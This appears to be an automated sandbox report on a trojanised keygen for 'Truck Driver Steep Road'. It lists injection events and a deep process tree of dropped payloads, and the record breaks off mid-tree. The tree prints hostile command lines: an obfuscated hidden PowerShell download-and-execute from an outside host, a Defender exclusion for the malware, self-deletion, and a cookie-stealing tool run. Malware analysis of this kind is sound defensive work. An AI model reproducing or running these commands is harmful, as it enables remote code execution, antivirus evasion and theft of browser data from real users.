SeEnableDelegationPrivilege 3180 askinstall20.exe Token: SeManageVolumePrivilege 3180 askinstall20.exe Token: SeImpersonatePrivilege 3180 askinstall20.exe Token: SeCreateGlobalPrivilege 3180 askinstall20.exe Token: 31 3180 askinstall20.exe Token: 32 3180 askinstall20.exe Token: 33 3180 askinstall20.exe Token: 34 3180 askinstall20.exe Token: 35 3180 askinstall20.exe Token: SeDebugPrivilege 916 multitimer.exe Token: SeDebugPrivilege 4044 MicrosoftEdge.exe Token: SeDebugPrivilege 4044 MicrosoftEdge.exe Token: SeDebugPrivilege 4044 MicrosoftEdge.exe Token: SeDebugPrivilege 4044 MicrosoftEdge.exe Token: SeDebugPrivilege 4348 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4348 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4348 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4348 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4580 multitimer.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4056 setups.exe 2280 setups.tmp 4044 MicrosoftEdge.exe 4280 MicrosoftEdgeCP.exe 4280 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 4092 wrote to memory of 4076 4092 Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe 78 PID 4092 wrote to memory of 4076 4092 Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe 78 PID 4092 wrote to memory of 4076 4092 Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe 78 PID 4076 wrote to memory of 2096 4076 cmd.exe 81 PID 4076 wrote to memory of 2096 4076 cmd.exe 81 PID 4076 wrote to memory of 2096 4076 cmd.exe 81 PID 4076 wrote to memory of 1152 4076 cmd.exe 82 PID 4076 wrote to memory of 1152 4076 cmd.exe 82 PID 4076 wrote to memory of 1152 4076 cmd.exe 82 PID 4076 wrote to memory of 1552 4076 cmd.exe 83 PID 4076 wrote to memory of 1552 4076 cmd.exe 83 PID 4076 wrote to memory of 1552 4076 cmd.exe 83 PID 4076 wrote to memory of 3884 4076 cmd.exe 84 PID 4076 wrote to memory of 3884 4076 cmd.exe 84 PID 4076 wrote to memory of 3884 4076 cmd.exe 84 PID 2096 wrote to memory of 1296 2096 keygen-pr.exe 85 PID 2096 wrote to memory of 1296 2096 keygen-pr.exe 85 PID 2096 wrote to memory of 1296 2096 keygen-pr.exe 85 PID 3884 wrote to memory of 512 3884 keygen-step-4.exe 86 PID 3884 wrote to memory of 512 3884 keygen-step-4.exe 86 PID 1552 wrote to memory of 732 1552 keygen-step-3.exe 88 PID 1552 wrote to memory of 732 1552 keygen-step-3.exe 88 PID 1552 wrote to memory of 732 1552 keygen-step-3.exe 88 PID 1296 wrote to memory of 3472 1296 key.exe 89 PID 1296 wrote to memory of 3472 1296 key.exe 89 PID 1296 wrote to memory of 3472 1296 key.exe 89 PID 732 wrote to memory of 192 732 cmd.exe 90 PID 732 wrote to memory of 192 732 cmd.exe 90 PID 732 wrote to memory of 192 732 cmd.exe 90 PID 512 wrote to memory of 916 512 Setup.exe 91 PID 512 wrote to memory of 916 512 Setup.exe 91 PID 512 wrote to memory of 4056 512 Setup.exe 92 PID 512 wrote to memory of 4056 512 Setup.exe 92 PID 512 wrote to memory of 4056 512 Setup.exe 92 PID 3884 wrote to memory of 3180 3884 keygen-step-4.exe 93 PID 3884 wrote to memory of 3180 3884 keygen-step-4.exe 93 PID 3884 wrote to memory of 3180 3884 keygen-step-4.exe 93 PID 4056 wrote to memory of 2280 4056 setups.exe 94 PID 4056 wrote to memory of 2280 4056 setups.exe 94 PID 4056 wrote to memory of 2280 4056 setups.exe 94 PID 916 wrote to memory of 4496 916 multitimer.exe 100 PID 916 wrote to memory of 4496 916 multitimer.exe 100 PID 4496 wrote to memory of 4580 4496 multitimer.exe 101 PID 4496 wrote to memory of 4580 4496 multitimer.exe 101 PID 4280 wrote to memory of 4348 4280 MicrosoftEdgeCP.exe 99 PID 4280 wrote to memory of 4348 4280 MicrosoftEdgeCP.exe 99 PID 4280 wrote to memory of 4348 4280 MicrosoftEdgeCP.exe 99 PID 4280 wrote to memory of 4348 4280 MicrosoftEdgeCP.exe 99 PID 4280 wrote to memory of 4348 4280 MicrosoftEdgeCP.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe"C:\Users\Admin\AppData\Local\Temp\Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵PID:3472
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1152
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:192
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Users\Admin\AppData\Local\Temp\OR2R4BN5II\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OR2R4BN5II\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Users\Admin\AppData\Local\Temp\OR2R4BN5II\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OR2R4BN5II\multitimer.exe" 1 3.1617432446.60680f7e9a04b 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Users\Admin\AppData\Local\Temp\OR2R4BN5II\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OR2R4BN5II\multitimer.exe" 2 3.1617432446.60680f7e9a04b7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4580 -
C:\Users\Admin\AppData\Local\Temp\po4mnoqh11n\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\po4mnoqh11n\KiffApp1.exe"8⤵PID:5072
-
-
C:\Users\Admin\AppData\Local\Temp\znp3vayvfjv\wtfsb3dobci.exe"C:\Users\Admin\AppData\Local\Temp\znp3vayvfjv\wtfsb3dobci.exe" /VERYSILENT8⤵PID:3108
-
C:\Users\Admin\AppData\Local\Temp\is-HL6EC.tmp\wtfsb3dobci.tmp"C:\Users\Admin\AppData\Local\Temp\is-HL6EC.tmp\wtfsb3dobci.tmp" /SL5="$700D4,2592217,780800,C:\Users\Admin\AppData\Local\Temp\znp3vayvfjv\wtfsb3dobci.exe" /VERYSILENT9⤵PID:5132
-
C:\Users\Admin\AppData\Local\Temp\is-62CJT.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-62CJT.tmp\winlthsth.exe"10⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\Gm5H3IH28.exe"C:\Users\Admin\AppData\Local\Temp\Gm5H3IH28.exe"11⤵PID:6280
-
C:\Users\Admin\AppData\Local\Temp\Gm5H3IH28.exe"C:\Users\Admin\AppData\Local\Temp\Gm5H3IH28.exe"12⤵PID:6832
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:6316
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:7800
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\14qok2muebl\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\14qok2muebl\cpyrix.exe" /VERYSILENT8⤵PID:2264
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5892
-
C:\Users\Admin\AppData\Local\Temp\2390b0f7-4bbb-4094-a4e4-63fc14911155\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\2390b0f7-4bbb-4094-a4e4-63fc14911155\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\2390b0f7-4bbb-4094-a4e4-63fc14911155\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\2390b0f7-4bbb-4094-a4e4-63fc14911155\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\2390b0f7-4bbb-4094-a4e4-63fc14911155\AdvancedRun.exe" /SpecialRun 4101d8 557211⤵PID:4288
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵PID:6400
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:2208
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:6188
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:3696
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:3412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 190810⤵
- Program crash
PID:5940
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:4972
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:2700
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4on1gx4umuk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\4on1gx4umuk\Setup3310.exe" /Verysilent /subid=5778⤵PID:4560
-
C:\Users\Admin\AppData\Local\Temp\is-GU723.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-GU723.tmp\Setup3310.tmp" /SL5="$60312,138429,56832,C:\Users\Admin\AppData\Local\Temp\4on1gx4umuk\Setup3310.exe" /Verysilent /subid=5779⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\is-HSBIO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HSBIO.tmp\Setup.exe" /Verysilent10⤵PID:2644
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:5076
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:6664
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:4844
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:5860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 95612⤵
- Program crash
PID:4364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 100412⤵
- Program crash
PID:6908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 101612⤵
- Program crash
PID:4168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 115212⤵
- Program crash
PID:3640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 118812⤵
- Program crash
PID:7732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 120412⤵
- Program crash
PID:7712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 156812⤵
- Program crash
PID:5352
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 154012⤵
- Program crash
PID:7432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 176012⤵
- Program crash
PID:7596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 174412⤵
- Program crash
PID:7380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 175612⤵
- Program crash
PID:5556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 177612⤵
- Program crash
PID:7304
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 151612⤵
- Program crash
PID:1096
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:3432
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:5748
-
C:\Users\Admin\AppData\Local\Temp\is-O07VB.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-O07VB.tmp\LabPicV3.tmp" /SL5="$202C4,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:6096
-
C:\Users\Admin\AppData\Local\Temp\is-JTAER.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-JTAER.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:6420
-
C:\Program Files\Windows Photo Viewer\CFEINPPSGP\prolab.exe"C:\Program Files\Windows Photo Viewer\CFEINPPSGP\prolab.exe" /VERYSILENT14⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\is-HF2AI.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-HF2AI.tmp\prolab.tmp" /SL5="$30256,575243,216576,C:\Program Files\Windows Photo Viewer\CFEINPPSGP\prolab.exe" /VERYSILENT15⤵PID:5400
-
-
-
C:\Users\Admin\AppData\Local\Temp\54-2caf4-627-8cca7-3b74ae058d41a\Gyvohimaelu.exe"C:\Users\Admin\AppData\Local\Temp\54-2caf4-627-8cca7-3b74ae058d41a\Gyvohimaelu.exe"14⤵PID:4868
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 193215⤵PID:7664
-
-
-
C:\Users\Admin\AppData\Local\Temp\a2-13457-d79-4eba2-15f56094843bb\Qexifaepulo.exe"C:\Users\Admin\AppData\Local\Temp\a2-13457-d79-4eba2-15f56094843bb\Qexifaepulo.exe"14⤵PID:5204
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b3lmy2q4.3uv\md6_6ydj.exe & exit15⤵PID:7232
-
C:\Users\Admin\AppData\Local\Temp\b3lmy2q4.3uv\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\b3lmy2q4.3uv\md6_6ydj.exe16⤵PID:8000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qz4tb1da.mos\askinstall31.exe & exit15⤵PID:7772
-
C:\Users\Admin\AppData\Local\Temp\qz4tb1da.mos\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\qz4tb1da.mos\askinstall31.exe16⤵PID:7968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hfu51y1i.ayg\toolspab1.exe & exit15⤵PID:7432
-
C:\Users\Admin\AppData\Local\Temp\hfu51y1i.ayg\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hfu51y1i.ayg\toolspab1.exe16⤵PID:7368
-
C:\Users\Admin\AppData\Local\Temp\hfu51y1i.ayg\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hfu51y1i.ayg\toolspab1.exe17⤵PID:4744
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\avda1kgc.5hb\setup_10.2_mix.exe & exit15⤵PID:5964
-
C:\Users\Admin\AppData\Local\Temp\avda1kgc.5hb\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\avda1kgc.5hb\setup_10.2_mix.exe16⤵PID:7272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xljxkzan.nhj\GcleanerWW.exe /mixone & exit15⤵PID:6768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mw51tgev.qxt\app.exe /8-2222 & exit15⤵PID:7588
-
C:\Users\Admin\AppData\Local\Temp\mw51tgev.qxt\app.exeC:\Users\Admin\AppData\Local\Temp\mw51tgev.qxt\app.exe /8-222216⤵PID:5420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2tu4gvl4.1kb\file.exe & exit15⤵PID:3336
-
C:\Users\Admin\AppData\Local\Temp\2tu4gvl4.1kb\file.exeC:\Users\Admin\AppData\Local\Temp\2tu4gvl4.1kb\file.exe16⤵PID:4532
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵PID:5308
-
C:\Users\Admin\AppData\Local\Temp\LX1QI7O920\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LX1QI7O920\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:9140
-
C:\Users\Admin\AppData\Local\Temp\LX1QI7O920\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LX1QI7O920\multitimer.exe" 1 3.1617432736.606810a015563 10119⤵PID:7464
-
C:\Users\Admin\AppData\Local\Temp\LX1QI7O920\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LX1QI7O920\multitimer.exe" 2 3.1617432736.606810a01556320⤵PID:9128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9CL6BWKCIA\setups.exe"C:\Users\Admin\AppData\Local\Temp\9CL6BWKCIA\setups.exe" ll18⤵PID:9208
-
C:\Users\Admin\AppData\Local\Temp\is-H04A4.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-H04A4.tmp\setups.tmp" /SL5="$20668,635399,250368,C:\Users\Admin\AppData\Local\Temp\9CL6BWKCIA\setups.exe" ll19⤵PID:5772
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"17⤵PID:8332
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵PID:8212
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
PID:8828
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"17⤵PID:2880
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:8208
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:7032
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵PID:372
-
C:\Users\Admin\AppData\Roaming\C07F.tmp.exe"C:\Users\Admin\AppData\Roaming\C07F.tmp.exe"18⤵PID:8560
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\223rftnu.m4s\Four.exe & exit15⤵PID:7972
-
C:\Users\Admin\AppData\Local\Temp\223rftnu.m4s\Four.exeC:\Users\Admin\AppData\Local\Temp\223rftnu.m4s\Four.exe16⤵PID:4080
-
C:\Users\Admin\AppData\Local\Temp\6YWCYHAVH2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\6YWCYHAVH2\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:8556
-
C:\Users\Admin\AppData\Local\Temp\6YWCYHAVH2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\6YWCYHAVH2\multitimer.exe" 1 3.1617432733.6068109db5848 10418⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\6YWCYHAVH2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\6YWCYHAVH2\multitimer.exe" 2 3.1617432733.6068109db584819⤵PID:8812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ED4BO8CS9S\setups.exe"C:\Users\Admin\AppData\Local\Temp\ED4BO8CS9S\setups.exe" ll17⤵PID:8760
-
C:\Users\Admin\AppData\Local\Temp\is-VDMD1.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-VDMD1.tmp\setups.tmp" /SL5="$10752,635399,250368,C:\Users\Admin\AppData\Local\Temp\ED4BO8CS9S\setups.exe" ll18⤵PID:8844
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:5472
-
C:\Users\Admin\AppData\Local\Temp\is-GFQ5I.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-GFQ5I.tmp\lylal220.tmp" /SL5="$20390,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:5112
-
C:\Users\Admin\AppData\Local\Temp\is-S8QOV.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-S8QOV.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:4628
-
C:\Program Files\Windows Photo Viewer\XFLXNPCPNG\irecord.exe"C:\Program Files\Windows Photo Viewer\XFLXNPCPNG\irecord.exe" /VERYSILENT14⤵PID:7104
-
C:\Users\Admin\AppData\Local\Temp\is-N50S1.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-N50S1.tmp\irecord.tmp" /SL5="$9006A,6265333,408064,C:\Program Files\Windows Photo Viewer\XFLXNPCPNG\irecord.exe" /VERYSILENT15⤵PID:6396
-
-
-
C:\Users\Admin\AppData\Local\Temp\e8-f5ee5-09f-87282-dccc998413d5d\Kasholugasi.exe"C:\Users\Admin\AppData\Local\Temp\e8-f5ee5-09f-87282-dccc998413d5d\Kasholugasi.exe"14⤵PID:4828
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 242815⤵PID:5904
-
-
-
C:\Users\Admin\AppData\Local\Temp\28-9d69c-123-38bb6-777aa0ba48e2e\Wilaekegoqo.exe"C:\Users\Admin\AppData\Local\Temp\28-9d69c-123-38bb6-777aa0ba48e2e\Wilaekegoqo.exe"14⤵PID:5252
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nn2rcusf.0f3\md6_6ydj.exe & exit15⤵PID:3480
-
C:\Users\Admin\AppData\Local\Temp\nn2rcusf.0f3\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\nn2rcusf.0f3\md6_6ydj.exe16⤵PID:7892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zn4v5s4v.3nr\askinstall31.exe & exit15⤵PID:7632
-
C:\Users\Admin\AppData\Local\Temp\zn4v5s4v.3nr\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\zn4v5s4v.3nr\askinstall31.exe16⤵PID:7784
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:7620
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:5848
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uf3farnw.x24\toolspab1.exe & exit15⤵PID:8060
-
C:\Users\Admin\AppData\Local\Temp\uf3farnw.x24\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\uf3farnw.x24\toolspab1.exe16⤵PID:7328
-
C:\Users\Admin\AppData\Local\Temp\uf3farnw.x24\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\uf3farnw.x24\toolspab1.exe17⤵PID:6372
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w1ns4qqp.qhj\setup_10.2_mix.exe & exit15⤵PID:7276
-
C:\Users\Admin\AppData\Local\Temp\w1ns4qqp.qhj\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\w1ns4qqp.qhj\setup_10.2_mix.exe16⤵PID:6236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h5eoy544.00t\GcleanerWW.exe /mixone & exit15⤵PID:5836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hi2pulea.ugf\app.exe /8-2222 & exit15⤵PID:3396
-
C:\Users\Admin\AppData\Local\Temp\hi2pulea.ugf\app.exeC:\Users\Admin\AppData\Local\Temp\hi2pulea.ugf\app.exe /8-222216⤵PID:5604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\325gi521.2fa\file.exe & exit15⤵PID:7444
-
C:\Users\Admin\AppData\Local\Temp\325gi521.2fa\file.exeC:\Users\Admin\AppData\Local\Temp\325gi521.2fa\file.exe16⤵PID:8704
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"17⤵PID:8824
-
C:\Users\Admin\AppData\Local\Temp\K3CXTA31SO\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\K3CXTA31SO\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:8944
-
C:\Users\Admin\AppData\Local\Temp\K3CXTA31SO\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\K3CXTA31SO\multitimer.exe" 1 3.1617432751.606810af89b58 10119⤵PID:9136
-
